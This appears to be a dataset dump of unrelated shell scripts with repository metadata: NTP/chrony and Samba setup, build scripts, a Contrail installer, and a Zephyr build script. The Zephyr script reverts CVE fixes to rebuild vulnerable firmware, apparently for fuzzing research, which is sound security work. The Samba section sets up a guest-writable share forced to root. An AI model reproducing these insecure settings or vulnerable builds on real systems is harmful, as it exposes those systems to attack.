sudo systemctl stop ntp.service 1>/dev/null 2>/dev/null;
sudo systemctl disable ntp.service 1>/dev/null 2>/dev/null;
}
######################################################################
######################################################################
install_chrony() {
echo -e "\e[32minstall_chrony()\e[0m";
sudo apt-get -y install chrony;
}
######################################################################
setup_chrony() {
echo -e "\e[32msetup_chrony()\e[0m";
sudo systemctl stop chronyd.service;
sudo sh -c "cat << EOF > /etc/chrony/chrony.conf
# /etc/chrony/chrony.conf
## Stratum1
# https://chrony.tuxfamily.org/documentation.html
# http://www.catb.org/gpsd/gpsd-time-service-howto.html#_feeding_chrony_from_gpsd
# gspd is looking for
# /var/run/chrony.pps0.sock
# /var/run/chrony.ttyAMA0.sock
# Welcome to the chrony configuration file. See chrony.conf(5) for more
# information about usuable directives.
# PPS: /dev/pps0: Kernel-mode PPS ref-clock for the precise seconds
refclock PPS /dev/pps0 refid PPS precision 1e-9 lock NMEA poll 3 trust prefer
# SHM(2), gpsd: PPS data from shared memory provided by gpsd
refclock SHM 2 refid PPSx precision 1e-9 poll 3 trust
# SOCK, gpsd: PPS data from socket provided by gpsd
refclock SOCK /var/run/chrony.pps0.sock refid PPSy precision 1e-9 poll 3 trust
# SHM(0), gpsd: NMEA data from shared memory provided by gpsd
refclock SHM 0 refid NMEA precision 1e-3 offset 0.5 delay 0.2 poll 3 trust require
# any NTP clients are allowed to access the NTP server.
allow
# allows to appear synchronised to NTP clients, even when it is not.
local
# Stratum1 Servers
# https://www.meinbergglobal.com/english/glossary/public-time-server.htm
#
## Physikalisch-Technische Bundesanstalt (PTB), Braunschweig, Germany
#server ptbtime1.ptb.de iburst noselect
#server ptbtime2.ptb.de iburst noselect
#server ptbtime3.ptb.de iburst noselect
#
## Royal Observatory of Belgium
#server ntp1.oma.be iburst noselect
#server ntp2.oma.be iburst noselect
#
## Unizeto Technologies S.A., Szczecin, Polska
#server ntp.certum.pl iburst noselect
#
## SP Swedish National Testing and Research Institute, Boras, Sweden
#server ntp2.sp.se iburst noselect
# Other NTP Servers
#pool de.pool.ntp.org iburst noselect
# This directive specify the location of the file containing ID/key pairs for
# NTP authentication.
keyfile /etc/chrony/chrony.keys
# This directive specify the file into which chronyd will store the rate
# information.
driftfile /var/lib/chrony/chrony.drift
# Uncomment the following line to turn logging on.
#log tracking measurements statistics
# Log files location.
logdir /var/log/chrony
# Stop bad estimates upsetting machine clock.
maxupdateskew 100.0
# This directive tells 'chronyd' to parse the 'adjtime' file to find out if the
# real-time clock keeps local time or UTC. It overrides the 'rtconutc' directive.
hwclockfile /etc/adjtime
# This directive enables kernel synchronisation (every 11 minutes) of the
# real-time clock. Note that it can’t be used along with the 'rtcfile' directive.
rtcsync
# Step the system clock instead of slewing it if the adjustment is larger than
# one second, but only in the first three clock updates.
makestep 1 3
EOF";
sudo systemctl restart chronyd.service;
}
######################################################################
disable_chrony() {
echo -e "\e[32mdisable_chrony()\e[0m";
sudo systemctl stop chronyd.service 1>/dev/null 2>/dev/null;
sudo systemctl disable chronyd.service 1>/dev/null 2>/dev/null;
}
######################################################################
handle_samba() {
echo -e "\e[32mhandle_samba()\e[0m";
##################################################################
echo -e "\e[36m install samba\e[0m";
sudo apt-get -y install samba;
##################################################################
[ -d "/media/share" ] || {
echo -e "\e[36m create share folder\e[0m";
sudo mkdir -p /media/share;
}
##################################################################
grep -q Stratum1 /etc/samba/smb.conf 2> /dev/null || {
echo -e "\e[36m setup samba\e[0m";
sudo systemctl stop smb.service;
#sudo sed -i /etc/samba/smb.conf -n -e "1,/#======================= Share Definitions =======================/p";
sudo sh -c "cat << EOF >> /etc/samba/smb.conf
## Stratum1
[share]
comment = Share
path = /media/share/
public = yes
only guest = yes
browseable = yes
read only = no
writeable = yes
create mask = 0644
directory mask = 0755
force create mode = 0644
force directory mode = 0755
force user = root
force group = root
[ntpstats]
comment = NTP Statistics
path = /var/log/chrony/
public = yes
only guest = yes
browseable = yes
read only = yes
writeable = no
create mask = 0644
directory mask = 0755
force create mode = 0644
force directory mode = 0755
force user = root
force group = root
EOF";
sudo systemctl restart smbd.service;
}
}
######################################################################
handle_dhcpcd() {
echo -e "\e[32mhandle_dhcpcd()\e[0m";
grep -q Stratum1 /etc/dhcpcd.conf || {
echo -e "\e[36m setup dhcpcd.conf\e[0m";
sudo sh -c "cat << EOF >> /etc/dhcpcd.conf
## Stratum1
#interface eth0
#static ip_address=192.168.1.161/24
#static routers=192.168.1.1
#static domain_name_servers=192.168.1.1
EOF";
}
}
######################################################################
disable_timesyncd() {
echo -e "\e[32mdisable_timesyncd()\e[0m";
sudo systemctl stop systemd-timesyncd
sudo systemctl daemon-reload
sudo systemctl disable systemd-timesyncd
}
######################################################################
## test commands
######################################################################
#dmesg | grep pps
#sudo ppstest /dev/pps0
#sudo ppswatch -a /dev/pps0
#
#sudo gpsd -D 5 -N -n /dev/ttyAMA0 /dev/pps0 -F /var/run/gpsd.sock
#sudo systemctl stop gpsd.*
#sudo killall -9 gpsd
#sudo dpkg-reconfigure -plow gpsd
#minicom -b 9600 -o -D /dev/ttyAMA0
#cgps
#xgps
#gpsmon
#ipcs -m
#ntpshmmon
#
#chronyc sources
#chronyc sourcestats
#chronyc tracking
#watch -n 10 -p chronyc -m sources tracking
######################################################################
handle_locale
handle_timezone
handle_update
handle_gps
handle_pps
disable_timesyncd;
disable_ntp;
install_chrony;
setup_chrony;
handle_samba
handle_dhcpcd
######################################################################
echo -e "\e[32mDone.\e[0m";
echo -e "\e[1;31mPlease reboot\e[0m";
| true
|
dff9f187a7242f504679fd40dcf1bc244a637452
|
Shell
|
kaienkira/twilight-line-go
|
/build_windows.sh
|
UTF-8
| 369
| 2.75
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
os=windows
arch=amd64
cd client && \
GOOS="$os" GOARCH="$arch" go build \
-o ../bin/twilight-line-go-client-"$os"-"$arch".exe && \
cd - >/dev/null
if [ $? -ne 0 ]; then exit 1; fi
cd server && \
GOOS="$os" GOARCH="$arch" go build \
-o ../bin/twilight-line-go-server-"$os"-"$arch".exe && \
cd - >/dev/null
if [ $? -ne 0 ]; then exit 1; fi
exit 0
| true
|
8859f66daf3741225e6d223479e47396199a1afe
|
Shell
|
kwpeters/juggernautBash
|
/killjobs.bash
|
UTF-8
| 264
| 2.75
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# This script kills all background jobs.
# Reference: https://unix.stackexchange.com/questions/43527/kill-all-background-jobs
# Debian version
# kill $(jobs -p)
# OS X version
jobs -p | xargs kill
# Gnu version
# jobs -p | xargs -rn10 kill
| true
|
99cbc9a2479358af1f7ce3edcfb7baa5b32ca3f8
|
Shell
|
grassit/scripts-1
|
/revengapi
|
UTF-8
| 186
| 2.640625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Run the reverse engineering api
JAR=${1?Usage: $0 jar}
REVENG_HOME=/home/ian/workspace/revengapi/build
cd /tmp
java -cp ${REVENG_HOME}:${JAR} reveng.RevEngAPI -b ${JAR}
| true
|
87afab83d612d89bd71f20e85d794100cf7464aa
|
Shell
|
kombiHQ/kombi
|
/runtest
|
UTF-8
| 671
| 3.734375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# current dir
currentDir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
# library dir
libraryDir="$currentDir/src/lib"
case "$(uname -s)" in
CYGWIN*|MINGW**)
export PYTHONPATH="$(CYGPATH -w $libraryDir);$PYTHONPATH"
;;
*)
export PYTHONPATH="$libraryDir:$PYTHONPATH"
;;
esac
# figuring out which python is going to be used for the
# execution
if [[ -z "$KOMBI_PYTHON_EXECUTABLE" ]]; then
export KOMBI_PYTHON_EXECUTABLE="python"
fi
# running all tests
if [[ "$(python --version 2>&1)" == "Python 2"* ]]; then
$KOMBI_PYTHON_EXECUTABLE -m unittest discover -p "*Test.py" -v
else
$KOMBI_PYTHON_EXECUTABLE -m unittest discover -v
fi
| true
|
b75d504dfce00c749bb501ee5af28fc47f4aedb3
|
Shell
|
yiguotang/x-cloud
|
/xcloud/xcloud-driver-vmware/src/main/resources/shell/configIP.sh.txt
|
UTF-8
| 354
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
cat /proc/net/dev|awk {'print $1'}| awk -F: {'print $1'} > /tmp/cloudview_adaptor_2
while read line2
do
flag=1
while read line1
do
if [ $line1 == $line2 ]; then
flag=0
fi
done < /tmp/cloudview_adaptor_1
if [ $flag == 1 ]; then
ifconfig $line2 $1 netmask $2 up
route add default gw $3
fi
done < /tmp/cloudview_adaptor_2
| true
|
8f5c69b5dfc1ed684dc8a3477e567007530679cf
|
Shell
|
Darrenmei96/cps510
|
/script.sh
|
UTF-8
| 1,727
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/bash
usr="d2mei"
pw="01305179"
sqlinfo="$usr/$pw@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=oracle.scs.ryerson.ca)(Port=1521))(CONNECT_DATA=(SID=orcl)))"
echo "*************************************************"
echo "* CPS510 - Section 3 *"
echo "* Ryerson University *"
echo "* Group members: Jooha Kim, Jian Li, Darren Mei *"
echo "*************************************************"
getinput () {
read input
if [ "$input" == "1" ]; then
createtables
sleep .5
elif [ "$input" == "2" ]; then
poptables
sleep .5
elif [ "$input" == "3" ]; then
echo "Write your sql command: "
read sqlcommand
sqlplus64 -s "$sqlinfo"<<EOF
$sqlcommand
quit;
EOF
sleep .5
elif [ "$input" == "4" ]; then
sqlplus64 "$sqlinfo"
elif [ "$input" == "5" ]; then
sqlplus64 "$sqlinfo" @advquery.sql
elif [ "$input" == "9" ]; then
deltables
sleep.5
elif [ "$input" == "E" ] || [ $input == "e" ]; then
exit
else
echo "INVALID INPUT!!!"
fi
}
#export libraries if necessary
exportlibs () {
export LD_LIBRARY_PATH=/usr/lib/oracle/12.1/client64/lib
}
#create tables
createtables () {
sqlplus64 "$sqlinfo" @tableinit.sql
}
#populate tables
poptables () {
sqlplus64 "$sqlinfo" @tablepop.sql
}
#delete the tables
deltables () {
sqlplus64 "$sqlinfo" @tabledel.sql
}
main () {
exportlibs
while true; do
echo "Here are the options currently implemented: "
echo "1: Create the sql tables"
echo "2: Populate the sql tables"
echo "3: Enter commands into the SQL environment"
echo "4: Enter the SQL environment "
echo "5: Run the advanced queries "
echo " "
echo "9: Delete the sql table"
echo "E: Exit the shell script"
getinput
done
}
main
| true
|
034aa6a3d81baaf4b2825166928d3272a689c609
|
Shell
|
fuzzware-fuzzer/fuzzware-experiments
|
/03-fuzzing-new-targets/zephyr-os/building/docker_build_sample.sh
|
UTF-8
| 1,301
| 3.65625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# This script is to be run within the zephyr CI docker container
# It reproduces a vulnerable sample of zephyr-OS for the given CVE
set -x
set -e
# Create zephyr workspace for the given version if needed
workspace_dir=/workdir/workspace-$ZEPHYR_VERSION
if [ ! -e "$workspace_dir" ]; then
west init --mr=zephyr-v$ZEPHYR_VERSION $workspace_dir
cd $workspace_dir
west update
fi
cd /workdir/workspace-$ZEPHYR_VERSION/zephyr
export ZEPHYR_BASE=$(pwd)
# Restore git state
git reset --hard
git clean -df
git checkout "$BASE_COMMIT"
west update
# Backport fix for device binding bug
git cherry-pick 5b36a01a67dd705248496ef46999f39b43e02da9 --no-commit
# Revert the changes that fixed the issue (but keep the other fixes)
for commit in $FIX_COMMITS; do
git revert "$commit" -n
done
# Apply base patches
for patch in ${PATCHES:-}; do
git apply /workdir/building/patches/$patch
done
# Build sample
cd $SAMPLE_DIR
rm -rf build
west build --pristine always -b $BOARD . -- -DSHIELD="$SHIELD" -DOVERLAY_CONFIG="$OVERLAYS" ${EXTRA_DEFINES:-}
# Copy sample to outside-visible directory
OUT_DIR="/workdir/rebuilt/CVE-$CVENUM"
rm -rf $OUT_DIR
mkdir -p $OUT_DIR
cp build/zephyr/zephyr.elf $OUT_DIR/zephyr-CVE-$CVENUM.elf
cp build/zephyr/zephyr.bin $OUT_DIR/zephyr-CVE-$CVENUM.bin
| true
|
a00bfd7a75c3e72166f5a457885a624aff11fa9d
|
Shell
|
katalon-studio/docker-images
|
/test/project/run_chrome_root.sh
|
UTF-8
| 298
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
set -xe
ksversion=$1
apiKey=$2
docker run -t --rm -e KATALON_USER_ID=`id -u $USER` -v "$(pwd)":/katalon/katalon/source katalonstudio/katalon:$ksversion katalon-execute.sh -browserType="Chrome" -retry=0 -statusDelay=15 -testSuitePath="Test Suites/TS_RegressionTest" -apiKey=${apiKey}
| true
|
cdf883ceed33dbbd548b92f869131057f9c6d62e
|
Shell
|
focusaurus/tealeaves
|
/bin/docker-build.sh
|
UTF-8
| 1,726
| 3.53125
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Please Use Google Shell Style: https://google.github.io/styleguide/shell.xml
# ---- Start unofficial bash strict mode boilerplate
# http://redsymbol.net/articles/unofficial-bash-strict-mode/
set -o errexit # always exit on error
set -o errtrace # trap errors in functions as well
set -o pipefail # don't ignore exit codes when piping output
set -o posix # more strict failures in subshells
# set -x # enable debugging
IFS="$(printf "\n\t")"
# ---- End unofficial bash strict mode boilerplate
cd "$(dirname "${BASH_SOURCE[0]}")/.."
# The backslash escaped variables below are so bash doesn't immediately
# replace them with their environment variable values before passing to docker
dockerfile=$(
cat <<EOF
# Based on https://github.com/rust-lang-nursery/docker-rust-nightly/blob/master/nightly/Dockerfile
FROM buildpack-deps:stretch
ARG USER
ARG USER_ID=1000
ARG GROUP_ID=1000
RUN addgroup --gid \${GROUP_ID} \${USER}; \
adduser --disabled-password --gid \${GROUP_ID} --uid \${USER_ID} --gecos \${USER} \${USER}
USER ${USER}
WORKDIR /opt
ENV \
PATH=/home/${USER}/.cargo/bin:/opt/target/debug:\${PATH}
RUN set -eux; \
cd; \
wget --quiet "https://static.rust-lang.org/rustup/dist/x86_64-unknown-linux-gnu/rustup-init"; \
chmod +x rustup-init; \
./rustup-init -y --no-modify-path --default-toolchain nightly-2018-09-13; \
rustup component add clippy-preview; \
rm rustup-init; \
rustup component add clippy-preview rustfmt-preview;
EOF
)
# chown -R \${USER}:\${GROUP_ID} /opt/target/registry;
echo "${dockerfile}" | docker build \
--tag "$(basename "${PWD}")" \
--build-arg "USER=${USER}" \
--build-arg "USER_ID=$(id -u)" \
--build-arg "GROUP_ID=$(id -g)" \
-
| true
|
17baf3531694e9de78bc625a4775adb68097fb57
|
Shell
|
Tubbz-alt/rce-gen3-sw-lib
|
/test/hello_workshop/build.sh
|
UTF-8
| 2,193
| 3.015625
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Build the hello world example for RTEMS
#
# To run this, you need to be in the directory where you found this script.
#set -x
#Compile the objects
rtems-gcc hello_so_1.c -I${RTEMS_SDK}/include/core \
-I${RTEMS_SDK}/include/rtems \
-o hello_so_1.o
rtems-gcc hello_so_2.c -I${RTEMS_SDK}/include/core \
-I${RTEMS_SDK}/include/rtems \
-o hello_so_2.o
#Link the .so images
rtems-ld hello_so_1.o -L${RTEMS_SDK}/lib \
-L${RTEMS_SDK}/tgt/rtems \
-l:rtems.so \
-Wl,-soname,examples:hello_1.so \
-o hello_1.so
rtems-ld hello_so_2.o -L${RTEMS_SDK}/lib \
-L${RTEMS_SDK}/tgt/rtems \
-l:rtems.so \
-Wl,-soname,examples:hello_2.so \
-o hello_2.so
#Compile the .exe object
rtems-gcc hello_task.c -I${RTEMS_SDK}/include/core \
-I${RTEMS_SDK}/include/rtems \
-o hello_task.o
#Compile the .svt object
rtems-gcc hello_svt.c -I${RTEMS_SDK}/include/core \
-o hello_svt.o
#Link the .svt image
rtems-svt hello_svt.o -L${RTEMS_SDK}/lib \
-l:rtems.so \
-Wl,-soname,examples:hello.svt \
-o hello.svt
#Link the .exe images
rtems-task hello_task.o -L${RTEMS_SDK}/lib \
-l:rtems.so -l:hello_1.so \
-Wl,-soname,examples:hello_1.exe \
-o hello_1.exe
rtems-task hello_task.o -L${RTEMS_SDK}/lib \
-l:rtems.so -l:hello_2.so \
-Wl,-soname,examples:hello_2.exe \
-o hello_2.exe
[ ! -e ../compiled ] && mkdir ../compiled
cp *.o *.so *.svt *.exe ../compiled
rm *.o *.so *.svt *.exe
| true
|
f56831c9de375df69d25c9176dea2f1bb473ceba
|
Shell
|
projectlegionos/aosp-buildernew
|
/upload_ccache
|
UTF-8
| 500
| 2.953125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
cd /tmp
# Compress function with pigz for faster compression
com ()
{
tar --use-compress-program="pigz -k -$2 " -cf $1.tar.gz $1
}
time com ccache 1 # Compression level 1, its enough
if [ $with_gapps == "true" ];then # This is me testing out whether ccache's of vanilla and gapps build vary in build time...May remove this check in future
time rclone copy ccache.tar.gz drive:ccache/legion-gapps -P
else
time rclone copy ccache.tar.gz drive:ccache/legion-vanilla -P
fi
| true
|
4d5305169443ae8ff1d8954df8ac2383b63475cf
|
Shell
|
Simas1/exercism-exercises
|
/bash/luhn/luhn.sh
|
UTF-8
| 959
| 3.78125
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
input=$*
input=${input//[[:blank:]]/}
if ! [[ "$input" =~ ^[0-9]{2,}$ ]]; then
echo 'false'
exit 0
fi
num=${input// /}
declare -a arr=()
for ((i=0; i<${#num}; i++)); do
if [ $(((i+1)%2)) -ne 0 ]; then
# echo ${num:$i:1}
dup=$((${num:$i:1}*2))
[ $dup -gt 9 ] && dup=$((dup-9))
arr+=($dup)
else
arr+=(${num:$i:1})
fi
done
sum=0
for n in ${arr[@]}; do
sum=$((sum+n))
done
echo $sum
if [ $((sum%10)) -eq 0 ] && [ $sum -ne 0 ]; then
echo 'true'
else
echo 'false'
fi
# #!/usr/bin/env bash
# num=$(echo $1 | tr -d " " | sed -e 's/0//')
# [[ $num =~ ^[0-9\s]+$ ]] || { echo false ; exit 0; }
# ! [ ${#num} -lt 2 ] || { echo false ; exit 0 ; }
# counter=0
# total=0
# for x in $(echo $num | grep -o .); do
# ((x * 2 >= 10)) && y=$((x * 2 - 9)) || y=$((x * 2))
# ((counter % 2 == 0)) && ((total += $y)) || ((total += $x))
# ((counter++))
# done
# ((total % 10 == 0)) && echo true || echo false
| true
|
8e95da502705a0a89e43a38000203a6d78dfdd99
|
Shell
|
limkokholefork/bash-cheat
|
/bin/find-scripts.BUG
|
UTF-8
| 875
| 4.1875
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
#------------------------------------------------------------
#
# Ciro D. Santilli
#
# finds scripts based on extension and shebangs
# and returns their paths null separated
#
# shebangs can be either of type #!/bin/XXX or #!/bin/env/
#
# currently supported script types types:
#
# bash : 'sh', 'bash'
# python : 'py'
#
#
#------------------------------------------------------------
set -u # error on undefined variable
set -e # stop execution if one command goes wrong
usage()
{
echo 'Usage: '
}
# fixed nargs checking
if [ $# -ne 1 ]
then
usage
exit 1
else
EXT="$1"
if [ "$EXT" == "sh" && "$EXT" == "bash" ]
then
RESULT="$(find . -name "*.sh" -o -name "*.bash" -print0)"
RESULT="${RESULT}\0$( find-first-line )"
else # other scripts, no shebang support
find-bash-scripts | xargs -0 git add
fi
echo $RESULT
exit 0
fi
| true
|
c9a11197488cd421e62521cf5516992361c37bc5
|
Shell
|
joshnykamp/opscenter6
|
/scripts/teardown_docker_cluster.sh
|
UTF-8
| 531
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/sh
NUM_NODES=$1
if [ -z "$NUM_NODES" ]; then
echo "usage teardown_docker_cluster.sh NumNodes"
echo " NumNodes the number of nodes started when using start_docker_cluster.sh"
exit 1
fi
echo "Stop opscenter (if available)"
docker stop opscenter > /dev/null 2>&1
echo "Remove opscenter (if available)"
docker rm opscenter > /dev/null 2>&1
let n=1
let NUM_NODES=NUM_NODES+1
while [ $n != $NUM_NODES ]; do
echo "Stop node${n}"
docker stop node${n}
echo "Remove node${n}"
docker rm node${n}
let n=n+1
done
| true
|
8c4d750141bfd07b6f1ffb422cefe8bf8f01967a
|
Shell
|
michalstruna/exoplanets-ai
|
/scripts/dev.sh
|
UTF-8
| 317
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
cd "$(dirname "${BASH_SOURCE[0]}")"
. ./argparser.sh
if [ $server -eq 1 ]; then
x-terminal-emulator -e mongod
x-terminal-emulator -e ./server-dev.sh
fi
if [ $web -eq 1 ]; then
x-terminal-emulator -e ./web-dev.sh
fi
if [ $client -eq 1 ]; then
x-terminal-emulator -e ./client-dev.sh
fi
| true
|
96fd0ab5d7201f6df34508ac2b62972049eb950b
|
Shell
|
Juniper/tf-os-k8s-vagrant
|
/scripts/aio-ansible-os-k8s.sh
|
UTF-8
| 1,399
| 2.609375
| 3
|
[] |
no_license
|
#!/bin/bash -v
sudo yum install -y git ansible-2.4.2.0 pciutils wget tcpdump net-tools
# Download Contrail-Ansible-Deployer code For GA R5.0 use 1st command
sudo git clone -b R5.0 https://github.com/Juniper/contrail-ansible-deployer /opt/contrail-ansible-deployer
# sudo git clone https://github.com/Juniper/contrail-ansible-deployer.git /opt/contrail-ansible-deployer
export BASE_DIR=/opt
export OC_PATH=${BASE_DIR}/contrail-ansible-deployer
cd ${BASE_DIR}
rm -rf ${OC_PATH}/config/instances.yaml
cp /home/vagrant/instances.yaml ${OC_PATH}/config/
cd ${OC_PATH}
sudo ansible-playbook -i inventory/ playbooks/configure_instances.yml
sudo ansible-playbook -i inventory/ -e orchestrator=openstack playbooks/install_contrail.yml
# Install Weave Scope for Conatiners monitoring
sudo curl -L git.io/scope -o /usr/bin/scope
sudo chmod a+x /usr/bin/scope
scope launch
echo ******** Clusterbinding for K8s Dashboard ******************
kubectl replace -f https://raw.githubusercontent.com/Juniper/contrail-helm-deployer/master/rbac/cluster-admin.yaml
# If vRouter Agent did not start due to following error "ksync_memory.cc:107: void KSyncMemory::Mmap(bool): Assertion `0' failed" use following command to clean
free -h
echo 3 > /proc/sys/vm/drop_caches
free -h
# Other vrouter commands
#lsmod | grep vrouter
#modprobe vrouter
#cd /etc/contrail/vrouter
#docker-compose down
#docker-compose up -d
| true
|
0eebd6da2e4393cbd3d9723002d124b0c3769bc1
|
Shell
|
ConYel/spar_pipeline
|
/scripts/create_bedgraph_track.sh
|
UTF-8
| 431
| 3.140625
| 3
|
[
"MIT"
] |
permissive
|
set -e
#source `dirname $0`/../config.sh
if [ $# -lt 3 ]
then
echo "USAGE: `basename $0` <input.bedgraph> <chrom.sizes> <out.bigWig"
exit 1
fi
#chromInfo=`dirname $0`/../annot/chromInfo.txt
INBG=$1 # input bedgraph
chromInfo=$2
OUTBIGWIG=$3 #"${INBG%.*}.bigWig" # output bedgraph
#if [ -f "${INBG}" ] && [ -s "${INBG}" ]; then
if [ -s "${INBG}" ]; then
${BGTOBIGWIG} ${INBG} ${chromInfo} ${OUTBIGWIG}
fi
#bedGraphToBigWig
| true
|
86d5e28d79386c3a3a1d28d6878619517a2818e1
|
Shell
|
cligraphy/cligraphy
|
/staging/setup/setup
|
UTF-8
| 787
| 3.734375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
#
if test "$1" = "-h" -o "$1" = "--help" -o "$1" = "help"; then
echo "setup [fragment...]: sets up environment for the oc tool suite"
exit 0
elif test -z "$1"; then
PARTS=(
base
python
homebrew
apt
yum
pkg
)
else
declare -a PARTS=("$@")
fi
function failed {
echo FAILED
exit 1
}
if test -z "$CLIGRAPHY_REPO_PATH"; then
echo "CLIGRAPHY_REPO_PATH environmental variable not set"
failed
fi
source "${CLIGRAPHY_REPO_PATH}/setup/lib_setup.sh"
oc_setup_init
oc_no_root
export CLIGRAPHY_LOG
for ((i = 0; i < ${#PARTS[@]}; i++)); do
PART=${PARTS[$i]}
/bin/echo -n "Running ${PART} ... "
oc_run ${CLIGRAPHY_REPO_PATH}/setup/${PARTS[$i]}/run && echo OK || failed ${PART}
done
| true
|
80f670ca3914ec0bcf888c18ceede15b598ce671
|
Shell
|
kfaustino/dotfiles
|
/zsh/prompt.zsh
|
UTF-8
| 1,194
| 3.546875
| 4
|
[
"MIT"
] |
permissive
|
autoload colors && colors
if (( $+commands[git] ))
then
git="$commands[git]"
else
git="/usr/bin/git"
fi
git_branch() {
echo $($git symbolic-ref HEAD 2>/dev/null | awk -F/ {'print $NF'})
}
git_dirty() {
st=$($git status --porcelain 2>/dev/null | tail -n 1)
if [[ "$st" == "" ]]
then
st=$($git status 2>/dev/null | tail -n 1)
if [[ "$st" =~ ^nothing ]]
then
echo "on %{$fg_bold[green]%}$(git_branch)%{$reset_color%}"
else
echo ""
fi
else
echo "on %{$fg_bold[red]%}$(git_branch)%{$reset_color%}"
fi
}
unpushed () {
$git cherry -v @{upstream} 2>/dev/null
}
need_push () {
if [[ $(unpushed) == "" ]]
then
echo " "
else
echo " with %{$fg_bold[magenta]%}unpushed%{$reset_color%} "
fi
}
ruby_version() {
echo "$(rbenv version | awk '{print $1}')"
}
rb_prompt() {
if ! [[ -z "$(ruby_version)" ]]
then
echo "%{$fg_bold[yellow]%}$(ruby_version)%{$reset_color%} "
else
echo ""
fi
}
directory_name() {
echo "%{$fg_bold[cyan]%}%1/%\/%{$reset_color%}"
}
export PROMPT=$'\n$(rb_prompt)in $(directory_name) $(git_dirty)$(need_push)\n› '
set_prompt () {
export RPROMPT="%{$fg_bold[cyan]%}%{$reset_color%}"
}
| true
|
413ed5d546467a7b2a63337d449486f8ea230676
|
Shell
|
kitada4010/sbc
|
/shell/sed-filename.sh
|
UTF-8
| 215
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
for i in $(seq $(find . -type d | wc -l))
do
find . -maxdepth $i -name "$1" | \
while read line
do newline=$(echo $line | sed "s/'$1'/'$2'/g")
echo $newline
mv "$line" $newline
done
done
| true
|
09f5a050a794498829c62396cadd73af4f816b75
|
Shell
|
smxlong/minespray
|
/install-docker.sh
|
UTF-8
| 268
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
for NODE_IP in $(linode-cli linodes list --tags k8s --json | jq -r '.[].ipv4[0]'); do
scp -o StrictHostKeychecking=no -i hufr install-docker-script.sh $NODE_IP:/root
ssh -o StrictHostKeychecking=no -i hufr $NODE_IP /root/install-docker-script.sh
done
| true
|
b82da4394e922fa7da62e35889ad70ee3a162233
|
Shell
|
umanathlanka/edgeapps
|
/network-functions/sdewan_cnf/e2e-scenarios/three-single-node-clusters/edge1/start_cnf.sh
|
UTF-8
| 1,075
| 2.921875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# SPDX-License-Identifier: Apache-2.0
# Copyright (c) 2020 Intel Corporation
# start sdewan cnf with 2 provider networks.
PNET_IFC=net2
PNET_IP=$EDGE1_CNF_NET1_IFIP
PNET_NAME=pnetwork1
ONET_IFC=net3
ONET_IP=$EDGE1_CNF_NET3_IFIP
ONET_NAME=pnetwork2
SDEWAN_VALUES_FILE=./edgeapps/network-functions/sdewan_cnf/chart/sdewan-cnf/values.yaml
sed -i -e 's/\(.*registry:\).*/\1 ""/' $SDEWAN_VALUES_FILE
# provider network seting
sed -i -e ":a;N;\$!ba; s/\(interface: \)\"\"/\1$PNET_IFC/1" $SDEWAN_VALUES_FILE
sed -i -e ":a;N;\$!ba; s/\(ipAddress: \)\"\"/\1$PNET_IP/1" $SDEWAN_VALUES_FILE
sed -i -e ":a;N;\$!ba; s/\(name: \)\"\"/\1$PNET_NAME/1" $SDEWAN_VALUES_FILE
# ovn network seting
sed -i -e ":a;N;\$!ba; s/\(interface: \)/\1$ONET_IFC/2" $SDEWAN_VALUES_FILE
sed -i -e ":a;N;\$!ba; s/\(ipAddress: \)/\1$ONET_IP/2" $SDEWAN_VALUES_FILE
sed -i -e ":a;N;\$!ba; s/\(name: \)/\1$ONET_NAME/3" $SDEWAN_VALUES_FILE
sed -i -e 's/\([^ ]\)""/\1/' $SDEWAN_VALUES_FILE
cd edgeapps/network-functions/sdewan_cnf || return
helm install sdewan-cnf chart/sdewan-cnf/
cd - || return
| true
|
e27004f4a96657a39d3a042e305249740eece51e
|
Shell
|
basilmusa/java2bash
|
/src/main/java/java2bash/java2bash/core/BashScript.bash
|
UTF-8
| 403
| 2.90625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -euo pipefail
########## COMMON INCLUDES #################################################
{{uniqueCode}}
########## CODE ############################################################
{{code}}
{% if cleanupCode is not empty %}
########## CLEANUP CODE ####################################################
function finish_cleanup {
{{cleanupCode}}
}
trap finish_cleanup EXIT
{% endif %}
| true
|
74e0a2705fdd8d10dd296400d58f08a9084d64e0
|
Shell
|
andavb/Bash-calculator
|
/generirajMatriko.sh
|
UTF-8
| 2,805
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
#pravilen vnos mora biti tako da vpisemo stevila v matriko [ 1 2 3 4 , 5 6 7 8 ] vedno locimo s presledki
#./generirajMatriko.sh [ 1.23 2.45 3.4 5.3 , 1.3 1.4 2.72 4.56 ] [ 1 2 3 4 , 5 6 7 8 ]
#./generirajMatriko.sh [ 1.23 2.45 3.4 5.3 , 1.3 1.4 2.72 4.56 ] [ 12 32 43.2 -12.3 , 2 33.2 1.56 -12.452 ]
#./generirajMatriko.sh [ 1.23 2.45 3.4 , 1.3 1.4 2.72 ] [ 12 32 43.2 , 2 33.2 1.2 , 1 2 3 ]
#./generirajMatriko.sh [ 1 2 3 4 , 5 6 7 8 , 9 10 11 12 , 13 14 15 16 ] [ 1 1 -1 -2 , 5 -5 7 8 , -8 10 -11 12 , 13 14 -14 16 ]
#./generirajMatriko.sh [ 2 , 2 ] [ 2 2 ]
#vejica pomeni nova vrstica matrike.
stevec1=0
stevec2=0
if [ -f "matrika1.dat" ]
then
